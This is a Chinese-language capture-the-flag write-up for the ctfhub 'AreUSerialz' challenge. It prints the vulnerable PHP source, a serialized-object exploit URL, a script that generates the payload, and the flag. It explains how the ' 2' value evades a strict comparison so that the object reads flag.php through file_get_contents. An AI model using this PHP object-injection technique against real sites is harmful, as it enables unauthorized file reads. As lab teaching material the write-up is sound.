一、答案
题目地址如下所示:
AreUSerialz
poc如下所示:
/?str=O:11:“FileHandler”:3:{s:2:“op”;s:2:" 2";s:8:“filename”;s:8:“flag.php”;s:7:“content”;s:2:“xx”;}
flag:
ctfhub{96e5b05df6c9444d3fcda946}
二、解题流程
如下代码所示,是该题的代码:
<?php
include("flag.php");
highlight_file(__FILE__);
class FileHandler {
protected $op;
protected $filename;
protected $content;
function __construct() {
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}
public function process() {
if($this->op == "1") {
$this->write();
} else if($this->op == "2") {
$res = $this->read();
$this->output($res);
} else {
$this->output("Bad Hacker!");
}
}
private function write() {
if(isset($this->filename) && isset($this->content)) {
if(strlen((string)$this->content) > 100) {
$this->output("Too long!");
die();
}
$res = file_put_contents($this->filename, $this->content);
if($res) $this->output("Successful!");
else $this->output("Failed!");
} else {
$this->output("Failed!");
}
}
private function read() {
$res = "";
if(isset($this->filename)) {
$res = file_get_contents($this->filename);
}
return $res;
}
private function output($s) {
echo "[Result]: <br>";
echo $s;
}
function __destruct() {
if($this->op === "2")
$this->op = "1";
$this->content = "";
$this->process();
}
}
function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}
if(isset($_GET{'str'})) {
$str = (string)$_GET['str'];
if(is_valid($str)) {
$obj = unserialize($str);
}
}
整个代码的流程如下所示:
- 首先第一步读取的字符串应该是什么
<?php class FileHandler { public $op = ' 2'; public $filename = 'flag.php'; public $content = 'xx'; } $a = new FileHandler(); $b = serialize($a); echo $b . PHP_EOL; //我们的目标就是得到$b $c = unserialize($b); echo $c->op; ?>
- 由于:
function __destruct() { if($this->op === "2") $this->op = "1";
所以,
public $op = ' 2';
绕过 - 由于第五步:
private function read() { $res = ""; if(isset($this->filename)) { $res = file_get_contents($this->filename); } return $res; }
所以,
public $filename = 'flag.php';
读取flag